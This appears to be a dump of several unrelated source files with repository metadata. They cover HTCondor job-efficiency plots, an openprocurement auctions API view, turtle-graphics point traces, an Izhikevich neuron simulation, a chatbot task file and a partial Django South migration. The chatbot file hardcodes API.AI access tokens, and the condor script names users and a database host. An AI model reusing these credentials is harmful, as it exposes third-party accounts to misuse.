if(x == 0):
zerocount +=1
efflist.append(x/y)
totcount += 1
goodcount +=1
return [efflist, goodcount, totcount]
#Given at least one input for username/cluster/site, creates a histogram of the RemoteUserCpu/RemoteWallClockTime for the results
def efficiencyHistogram(username, cluster, site, coll, bins, xlab, ylab, title):
retlist = getEfficiency(username, cluster, site, coll) #0: efflist, 1: goodcount, 2: totcount
print("Jobs Plotted:", retlist[1], "/", retlist[2])
plotHist(retlist[0], bins, xlab, ylab, title)
def fourEffHists(lst1, lst2, lst3, lst4, lab1, lab2, lab3, lab4, bs, xlab, ylab, title):
plt.hist(lst1, bins=bs, histtype='stepfilled', label=lab1)
plt.hist(lst2, bins=bs, histtype='stepfilled', label=lab2)
plt.hist(lst3, bins=bs, histtype='stepfilled', label=lab3)
plt.hist(lst4, bins=bs, histtype='stepfilled', label=lab4)
plt.title(title)
plt.xlabel(xlab)
plt.ylabel(ylab)
plt.legend()
plt.show()
def mainEH(host, port):
client = MongoClient(host, port)
db = client.condor_history
coll = db.history_records
#sites: uc.mwt2.org, phys.uconn.edu, hpc.smu.edu, usatlas.bnl.gov
#names (@login01.osgconnect.net): lfzhao, sthapa, echism, wcatino, bamitchell
str_name = "bamitchell@login01.osgconnect.net"
efficiencyHistogram(str_name, None, None, coll, 75, "UserCPU/WallClockTime", "Frequency", "Efficiencies for " + str_name)
mainEH('mc.mwt2.org', 27017)
|
mit
| 4,049,639,096,715,589,000
| 22.46332
| 129
| 0.697334
| false
| 3.295011
| false
| false
| false
|
openprocurement/openprocurement.edge
|
openprocurement/edge/views/auctions.py
|
1
|
7066
|
# -*- coding: utf-8 -*-
from functools import partial
from openprocurement.edge.utils import (
context_unpack,
decrypt,
encrypt,
APIResource,
json_view
)
from openprocurement.edge.utils import eaopresource
from openprocurement.edge.design import (
by_dateModified_view_ViewDefinition,
real_by_dateModified_view_ViewDefinition,
test_by_dateModified_view_ViewDefinition,
by_local_seq_view_ViewDefinition,
real_by_local_seq_view_ViewDefinition,
test_by_local_seq_view_ViewDefinition,
)
from openprocurement.edge.design import AUCTION_FIELDS as FIELDS
VIEW_MAP = {
u'': real_by_dateModified_view_ViewDefinition('auctions'),
u'test': test_by_dateModified_view_ViewDefinition('auctions'),
u'_all_': by_dateModified_view_ViewDefinition('auctions'),
}
CHANGES_VIEW_MAP = {
u'': real_by_local_seq_view_ViewDefinition('auctions'),
u'test': test_by_local_seq_view_ViewDefinition('auctions'),
u'_all_': by_local_seq_view_ViewDefinition('auctions'),
}
FEED = {
u'dateModified': VIEW_MAP,
u'changes': CHANGES_VIEW_MAP,
}
@eaopresource(name='Auctions',
path='/auctions',
description="Open Contracting compatible data exchange format. See http://ocds.open-contracting.org/standard/r/master/#auction for more info")
class AuctionsResource(APIResource):
def __init__(self, request, context):
super(AuctionsResource, self).__init__(request, context)
self.server = request.registry.couchdb_server
self.update_after = request.registry.update_after
@json_view()
def get(self):
"""Auctions List
Get Auctions List
----------------
Example request to get auctions list:
.. sourcecode:: http
GET /auctions HTTP/1.1
Host: example.com
Accept: application/json
This is what one should expect in response:
.. sourcecode:: http
HTTP/1.1 200 OK
Content-Type: application/json
{
"data": [
{
"id": "64e93250be76435397e8c992ed4214d1",
"dateModified": "2014-10-27T08:06:58.158Z"
}
]
}
"""
# http://wiki.apache.org/couchdb/HTTP_view_API#Querying_Options
params = {}
pparams = {}
fields = self.request.params.get('opt_fields', '')
if fields:
params['opt_fields'] = fields
pparams['opt_fields'] = fields
fields = fields.split(',')
view_fields = fields + ['dateModified', 'id']
limit = self.request.params.get('limit', '')
if limit:
params['limit'] = limit
pparams['limit'] = limit
limit = int(limit) if limit.isdigit() and 1000 >= int(limit) > 0 else 100
descending = bool(self.request.params.get('descending'))
offset = self.request.params.get('offset', '')
if descending:
params['descending'] = 1
else:
pparams['descending'] = 1
feed = self.request.params.get('feed', '')
view_map = FEED.get(feed, VIEW_MAP)
changes = view_map is CHANGES_VIEW_MAP
if feed and feed in FEED:
params['feed'] = feed
pparams['feed'] = feed
mode = self.request.params.get('mode', '')
if mode and mode in view_map:
params['mode'] = mode
pparams['mode'] = mode
view_limit = limit + 1 if offset else limit
if changes:
if offset:
view_offset = decrypt(self.server.uuid, self.db.name, offset)
if view_offset and view_offset.isdigit():
view_offset = int(view_offset)
else:
self.request.errors.add('params', 'offset', 'Offset expired/invalid')
self.request.errors.status = 404
return
if not offset:
view_offset = 'now' if descending else 0
else:
if offset:
view_offset = offset
else:
view_offset = '9' if descending else ''
list_view = view_map.get(mode, view_map[u''])
if self.update_after:
view = partial(list_view, self.db, limit=view_limit, startkey=view_offset, descending=descending, stale='update_after')
else:
view = partial(list_view, self.db, limit=view_limit, startkey=view_offset, descending=descending)
if fields:
if not changes and set(fields).issubset(set(FIELDS)):
results = [
(dict([(i, j) for i, j in x.value.items() + [('id', x.id), ('dateModified', x.key)] if i in view_fields]), x.key)
for x in view()
]
elif changes and set(fields).issubset(set(FIELDS)):
results = [
(dict([(i, j) for i, j in x.value.items() + [('id', x.id)] if i in view_fields]), x.key)
for x in view()
]
elif fields:
self.LOGGER.info('Used custom fields for auctions list: {}'.format(','.join(sorted(fields))),
extra=context_unpack(self.request, {'MESSAGE_ID': 'auction_list_custom'}))
results = [
(dict([(k, j) for k, j in i[u'doc'].items() if k in view_fields]), i.key)
for i in view(include_docs=True)
]
else:
results = [
({'id': i.id, 'dateModified': i.value['dateModified']} if changes else {'id': i.id, 'dateModified': i.key}, i.key)
for i in view()
]
if results:
params['offset'], pparams['offset'] = results[-1][1], results[0][1]
if offset and view_offset == results[0][1]:
results = results[1:]
elif offset and view_offset != results[0][1]:
results = results[:limit]
params['offset'], pparams['offset'] = results[-1][1], view_offset
results = [i[0] for i in results]
if changes:
params['offset'] = encrypt(self.server.uuid, self.db.name, params['offset'])
pparams['offset'] = encrypt(self.server.uuid, self.db.name, pparams['offset'])
else:
params['offset'] = offset
pparams['offset'] = offset
data = {
'data': results,
'next_page': {
"offset": params['offset'],
"path": self.request.route_path('Auctions', _query=params),
"uri": self.request.route_url('Auctions', _query=params)
}
}
if descending or offset:
data['prev_page'] = {
"offset": pparams['offset'],
"path": self.request.route_path('Auctions', _query=pparams),
"uri": self.request.route_url('Auctions', _query=pparams)
}
return data
|
apache-2.0
| -6,018,885,631,503,351,000
| 37.612022
| 154
| 0.538353
| false
| 3.994347
| true
| false
| false
|
IhToN/DAW1-PRG
|
Ejercicios/SeguTrim/Objetos/Punto.py
|
1
|
4377
|
"""
Clase Punto
coord x
coord y
suma(punto)
resta(punto)
Clase Traza
instancias Punto en una Lista
añadir punto
comparar dos trazas (dos trazas serán iguales si sus puntos son iguales)
"""
import math
import turtle
class Punto:
def __init__(self, x=0.0, y=0.0):
self.x = float(x)
self.y = float(y)
def __str__(self):
return "Punto({}, {})".format(self.x, self.y)
def __eq__(self, other):
return (self.x, self.y) == (other.x, other.y)
def suma(self, punto):
""" Devuelve la suma vectorial del punto con otro
"""
return Punto(self.x + punto.x, self.y + punto.y)
def resta(self, punto):
""" Devuelve la resta vectorial del punto con otro
"""
return self.suma(-punto)
def distancia(self, punto):
""" Devuelve la distancia que hay entre un punto y otro
"""
return math.hypot(self.x - punto.x, self.y - punto.y)
class Traza:
def __init__(self, *args):
self.trazado = []
self.i = -1
for arg in args:
if isinstance(arg, Punto):
self.trazado.append(arg)
else:
raise ValueError(arg, "no es un punto.")
def __str__(self):
out = ""
for punto in self.trazado:
out += str(punto) + " "
return out
def __eq__(self, other):
return self.trazado == other.trazado
def __next__(self):
self.i += 1
if self.i < len(self.trazado):
return self.trazado[self.i]
else:
raise StopIteration
def __iter__(self):
return self
def add_punto(self, punto):
""" Añade un punto nuevo a la Traza
"""
if isinstance(punto, Punto):
self.trazado.append(punto)
else:
raise ValueError("¡Ioputa, que en las trazas sólo puede haber puntos y no cosas raras!")
def longitud_traza(self):
""" Devuelve la suma de la distancia entre todos los puntos de la traza
"""
ret = 0
for p in range(len(self.trazado) - 1):
ret += self.trazado[p].distancia(self.trazado[p + 1])
return ret
def dump_traza(self, fichero='traza.txt'):
""" Guardamos la traza en un fichero de trazas
"""
fichero = open(fichero, 'w', encoding="utf-8")
for punto in self.trazado:
fichero.write("{},{}\n".format(punto.x, punto.y))
fichero.close()
def load_traza(self, fichero):
try:
fichero = open(fichero, encoding="utf-8")
self.trazado = []
for linea in fichero:
if linea != "":
punto = linea.split(",")
self.add_punto(Punto(punto[0].strip(), punto[1].strip()))
except FileNotFoundError:
print("No existe el fichero.")
def dibuja(self):
tortuga = self.turtle
tortuga.down()
for punto in self.trazado:
tortuga.setpos(punto.x, punto.y)
tortuga.up()
def toggle_capture(self):
"""Activamos o desactivamos el modo captura, según toque"""
self.capture_mode = not self.capture_mode
if not self.capture_mode:
self.turtle.reset()
self.turtle.up()
self.turtle.setpos(self.trazado[0].x, self.trazado[0].y)
self.dibuja()
fichero = self.screen.textinput("Guardar Traza", "Dime el nombre del fichero:")
self.dump_traza(fichero + ".txt")
print(self)
def move_turtle(self, x, y):
"""Si estamos en modo captura, movemos la tortuga y vamos guardando los puntos"""
tortuga = self.turtle
if self.capture_mode:
tortuga.setheading(tortuga.towards(x, y))
tortuga.setpos(x, y)
self.add_punto(Punto(x, y))
def test():
p = Punto(3, 0)
k = Punto(0, 4)
tr = Traza(p, k)
print(tr)
tr.dump_traza("traza.txt")
tr.load_traza("traza.txt")
print(tr)
s = turtle.Screen()
t = turtle.Turtle()
tr.turtle = t
tr.screen = s
tr.capture_mode = False
s.onkey(tr.toggle_capture, 'space')
s.onclick(tr.move_turtle)
s.listen()
tr.dibuja()
turtle.done()
tr.dump_traza("traza.txt")
test()
|
apache-2.0
| -7,849,022,810,489,935,000
| 25.815951
| 100
| 0.538778
| false
| 3.133333
| false
| false
| false
|
pmediano/ComputationalNeurodynamics
|
Fall2016/Exercise_1/Solutions/IzNeuronRK4.py
|
1
|
1897
|
"""
Computational Neurodynamics
Exercise 1
Simulates Izhikevich's neuron model using the Runge-Kutta 4 method.
Parameters for regular spiking, fast spiking and bursting
neurons extracted from:
http://www.izhikevich.org/publications/spikes.htm
(C) Murray Shanahan et al, 2016
"""
import numpy as np
import matplotlib.pyplot as plt
# Create time points
Tmin = 0
Tmax = 200 # Simulation time
dt = 0.01 # Step size
T = np.arange(Tmin, Tmax+dt, dt)
# Base current
I = 10
## Parameters of Izhikevich's model (regular spiking)
a = 0.02
b = 0.2
c = -65
d = 8
## Parameters of Izhikevich's model (fast spiking)
# a = 0.02
# b = 0.25
# c = -65
# d = 2
## Parameters of Izhikevich's model (bursting)
# a = 0.02
# b = 0.2
# c = -50
# d = 2
## Make a state vector that has a (v, u) pair for each timestep
s = np.zeros((len(T), 2))
## Initial values
s[0, 0] = -65
s[0, 1] = -1
# Note that s1[0] is v, s1[1] is u. This is Izhikevich equation in vector form
def s_dt(s1, I):
v_dt = 0.04*(s1[0]**2) + 5*s1[0] + 140 - s1[1] + I
u_dt = a*(b*s1[0] - s1[1])
return np.array([v_dt, u_dt])
## SIMULATE
for t in range(len(T)-1):
# Calculate the four constants of Runge-Kutta method
k_1 = s_dt(s[t], I)
k_2 = s_dt(s[t] + 0.5*dt*k_1, I)
k_3 = s_dt(s[t] + 0.5*dt*k_2, I)
k_4 = s_dt(s[t] + dt*k_3, I)
s[t+1] = s[t] + (1.0/6)*dt*(k_1 + 2*k_2 + 2*k_3 + k_4)
# Reset the neuron if it has spiked
if s[t+1, 0] >= 30:
s[t, 0] = 30 # Add a Dirac pulse for visualisation
s[t+1, 0] = c # Reset to resting potential
s[t+1, 1] += d # Update recovery variable
v = s[:, 0]
u = s[:, 1]
## Plot the membrane potential
plt.subplot(211)
plt.plot(T, v)
plt.xlabel('Time (ms)')
plt.ylabel('Membrane potential v (mV)')
plt.title('Izhikevich Neuron')
# Plot the reset variable
plt.subplot(212)
plt.plot(T, u)
plt.xlabel('Time (ms)')
plt.ylabel('Reset variable u')
plt.show()
|
gpl-3.0
| 194,822,784,332,023,800
| 19.397849
| 78
| 0.618345
| false
| 2.319071
| false
| false
| false
|
RaminderSinghSahni/micro-ram-bot
|
tasks.py
|
1
|
4411
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from microsoftbotframework import Response
import celery
import os
import sys
import json
# import argparse
from google.cloud import language
import google.auth
# import language
try:
import apiai
except ImportError:
sys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir))
import apiai
# CLIENT_ACCESS_TOKEN = 'd18b44be8d0b41269a42704c00d44d77'
CLIENT_ACCESS_TOKEN = '039129d3176644e9ac91464ee9e7b5df'
def respond_to_conversation_update(message):
if message["type"] == "conversationUpdate":
response = Response(message)
message_response = 'Have fun with the Microsoft Bot Framework'
response.reply_to_activity(message_response, recipient={"id": response["conversation"]["id"]})
def echo_response(message):
if message["type"] == "message":
response = Response(message)
message_response = message["text"]
# response_info = response.reply_to_activity("in this")
# response_info = response.reply_to_activity(message_response)
with open('intervention.json') as data_file:
iData = json.load(data_file)
if iData["intervention"] == "0":
ai = apiai.ApiAI(CLIENT_ACCESS_TOKEN)
request1 = ai.text_request()
# request1.lang = 'en' # optional, default value equal 'en'
# request.session_id = "<SESSION ID, UBIQUE FOR EACH USER>"
# print("\n\nYour Input : ",end=" ")
# response.reply_to_activity(ai)
with open('session.json') as data_file:
data = json.load(data_file)
if data["session_id"] != "":
request1.session_id = data["session_id"]
request1.query = message_response
# request1.resetContexts = False
# request1.
# response_info = response.reply_to_activity("hello"+request1)
# print("\n\nBot\'s response :",end=" ")
response1 = request1.getresponse()
responsestr = response1.read().decode('utf-8')
response_obj = json.loads(responsestr)
with open('session.json', 'w') as outfile:
json.dump({"session_id": response_obj["sessionId"]}, outfile)
# print(response_obj["result"]["fulfillment"]["speech"])
response_info = response.reply_to_activity(response_obj["result"]["fulfillment"]["speech"])
else:
with open('message.json') as data_file:
data = json.load(data_file)
if data["message"] != "":
new_response = Response(data["message"])
# language_client = language.Client()
language_client = language.Client.from_service_account_json('Micro-av-bot-1.json')
# language_client = language.client
document = language_client.document_from_text(message_response)
# Detects sentiment in the document.
annotations = document.annotate_text(include_sentiment=True,
include_syntax=False,
include_entities=False)
score = annotations.sentiment.score
magnitude = annotations.sentiment.magnitude
# response_info = new_response.reply_to_activity('Overall Sentiment: score')
response_info = new_response.reply_to_activity('Overall Sentiment: score of {} with magnitude of {}'.format(score, magnitude))
# response_info = response.reply_to_activity("Intervention is turned on")
# from time import sleep
# sleep(2)
# response.delete_activity(activity_id=response_info.json()['id'])
# sleep(2)
# response.create_conversation('lets talk about something really interesting')
# This is a asynchronous task
@celery.task()
def echo_response_async(message):
if message["type"] == "message":
response = Response(message)
message_response = message["text"]
response.send_to_conversation(message_response)
|
mit
| -5,725,038,473,106,126,000
| 37.692982
| 150
| 0.568579
| false
| 4.261836
| false
| false
| false
|
orlenko/sfpirg
|
sfpirgapp/migrations/0022_auto__del_field_organization_mailing_address__add_field_organization_m.py
|
1
|
25180
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Deleting field 'Organization.mailing_address'
db.delete_column(u'sfpirgapp_organization', 'mailing_address_id')
# Adding field 'Organization.mailing_city'
db.add_column(u'sfpirgapp_organization', 'mailing_city',
self.gf('django.db.models.fields.CharField')(default='-', max_length=255),
keep_default=False)
# Adding field 'Organization.mailing_street'
db.add_column(u'sfpirgapp_organization', 'mailing_street',
self.gf('django.db.models.fields.CharField')(default='-', max_length=255),
keep_default=False)
# Adding field 'Organization.mailing_street2'
db.add_column(u'sfpirgapp_organization', 'mailing_street2',
self.gf('django.db.models.fields.CharField')(default='', max_length=255, null=True, blank=True),
keep_default=False)
# Adding field 'Organization.mailing_postal_code'
db.add_column(u'sfpirgapp_organization', 'mailing_postal_code',
self.gf('django.db.models.fields.CharField')(default='-', max_length=255),
keep_default=False)
# Changing field 'Organization.contact_phone'
db.alter_column(u'sfpirgapp_organization', 'contact_phone', self.gf('django.db.models.fields.CharField')(max_length=255, null=True))
# Changing field 'Organization.contact_position'
db.alter_column(u'sfpirgapp_organization', 'contact_position', self.gf('django.db.models.fields.CharField')(max_length=255, null=True))
# Changing field 'Organization.contact_email'
db.alter_column(u'sfpirgapp_organization', 'contact_email', self.gf('django.db.models.fields.EmailField')(max_length=255, null=True))
# Changing field 'Organization.contact_name'
db.alter_column(u'sfpirgapp_organization', 'contact_name', self.gf('django.db.models.fields.CharField')(max_length=255, null=True))
def backwards(self, orm):
# Adding field 'Organization.mailing_address'
db.add_column(u'sfpirgapp_organization', 'mailing_address',
self.gf('django.db.models.fields.related.ForeignKey')(default='-', to=orm['sfpirgapp.Address']),
keep_default=False)
# Deleting field 'Organization.mailing_city'
db.delete_column(u'sfpirgapp_organization', 'mailing_city')
# Deleting field 'Organization.mailing_street'
db.delete_column(u'sfpirgapp_organization', 'mailing_street')
# Deleting field 'Organization.mailing_street2'
db.delete_column(u'sfpirgapp_organization', 'mailing_street2')
# Deleting field 'Organization.mailing_postal_code'
db.delete_column(u'sfpirgapp_organization', 'mailing_postal_code')
# Changing field 'Organization.contact_phone'
db.alter_column(u'sfpirgapp_organization', 'contact_phone', self.gf('django.db.models.fields.CharField')(default='-', max_length=255))
# Changing field 'Organization.contact_position'
db.alter_column(u'sfpirgapp_organization', 'contact_position', self.gf('django.db.models.fields.CharField')(default='-', max_length=255))
# Changing field 'Organization.contact_email'
db.alter_column(u'sfpirgapp_organization', 'contact_email', self.gf('django.db.models.fields.EmailField')(default='-', max_length=255))
# Changing field 'Organization.contact_name'
db.alter_column(u'sfpirgapp_organization', 'contact_name', self.gf('django.db.models.fields.CharField')(default='-', max_length=255))
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'generic.assignedkeyword': {
'Meta': {'ordering': "('_order',)", 'object_name': 'AssignedKeyword'},
'_order': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'keyword': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'assignments'", 'to': u"orm['generic.Keyword']"}),
'object_pk': ('django.db.models.fields.IntegerField', [], {})
},
u'generic.keyword': {
'Meta': {'object_name': 'Keyword'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sites.Site']"}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '500'})
},
u'sfpirgapp.actiongroup': {
'Meta': {'ordering': "('_order',)", 'object_name': 'ActionGroup'},
'_meta_title': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'_order': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'category': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'action_groups'", 'to': u"orm['sfpirgapp.Category']"}),
'content': ('mezzanine.core.fields.RichTextField', [], {}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'expiry_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'featured_image': ('mezzanine.core.fields.FileField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'gen_description': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'in_sitemap': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'keywords': ('mezzanine.generic.fields.KeywordsField', [], {'object_id_field': "'object_pk'", 'to': u"orm['generic.AssignedKeyword']", 'frozen_by_south': 'True'}),
'keywords_string': ('django.db.models.fields.CharField', [], {'max_length': '500', 'blank': 'True'}),
'login_required': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'publish_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'short_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sites.Site']"}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '2'}),
'theme_color': ('django.db.models.fields.CharField', [], {'default': "'grey'", 'max_length': '255'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'titles': ('django.db.models.fields.CharField', [], {'max_length': '1000', 'null': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'actiongroups'", 'to': u"orm['auth.User']"})
},
u'sfpirgapp.address': {
'Meta': {'object_name': 'Address'},
'city': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'postal_code': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'street': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'street2': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255', 'null': 'True', 'blank': 'True'})
},
u'sfpirgapp.application': {
'Meta': {'object_name': 'Application'},
'email': ('django.db.models.fields.EmailField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sfpirgapp.Project']"}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.utcnow'})
},
u'sfpirgapp.category': {
'Meta': {'ordering': "('_order',)", 'object_name': 'Category'},
'_meta_title': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'_order': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'content': ('mezzanine.core.fields.RichTextField', [], {}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'expiry_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'featured_image': ('mezzanine.core.fields.FileField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'gen_description': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'in_sitemap': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'keywords': ('mezzanine.generic.fields.KeywordsField', [], {'object_id_field': "'object_pk'", 'to': u"orm['generic.AssignedKeyword']", 'frozen_by_south': 'True'}),
'keywords_string': ('django.db.models.fields.CharField', [], {'max_length': '500', 'blank': 'True'}),
'login_required': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'publish_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'short_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sites.Site']"}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '2'}),
'theme_color': ('django.db.models.fields.CharField', [], {'default': "'grey'", 'max_length': '255'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'titles': ('django.db.models.fields.CharField', [], {'max_length': '1000', 'null': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'categorys'", 'to': u"orm['auth.User']"})
},
u'sfpirgapp.dummytable': {
'Meta': {'object_name': 'DummyTable'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
u'sfpirgapp.liaison': {
'Meta': {'object_name': 'Liaison'},
'alt_email': ('django.db.models.fields.EmailField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '255'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'organization': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'liaisons'", 'to': u"orm['sfpirgapp.Organization']"}),
'phone': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'position': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
u'sfpirgapp.organization': {
'Meta': {'object_name': 'Organization'},
'communities': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'contact_alt_email': ('django.db.models.fields.EmailField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'contact_email': ('django.db.models.fields.EmailField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'contact_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'contact_phone': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'contact_position': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_registered': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'mailing_city': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'mailing_postal_code': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'mailing_street': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'mailing_street2': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255', 'null': 'True', 'blank': 'True'}),
'mandate': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sites.Site']"}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True', 'blank': 'True'}),
'sources_of_funding': ('django.db.models.fields.TextField', [], {}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'website': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'})
},
u'sfpirgapp.profile': {
'Meta': {'object_name': 'Profile'},
'bio': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'date_of_birth': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'on_mailing_list': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'organization': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sfpirgapp.Organization']", 'null': 'True', 'blank': 'True'}),
'photo': ('mezzanine.core.fields.FileField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['auth.User']", 'unique': 'True'})
},
u'sfpirgapp.project': {
'Meta': {'object_name': 'Project'},
'category': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'arx_projects'", 'to': u"orm['sfpirgapp.Category']"}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'date_start': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'description_long': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
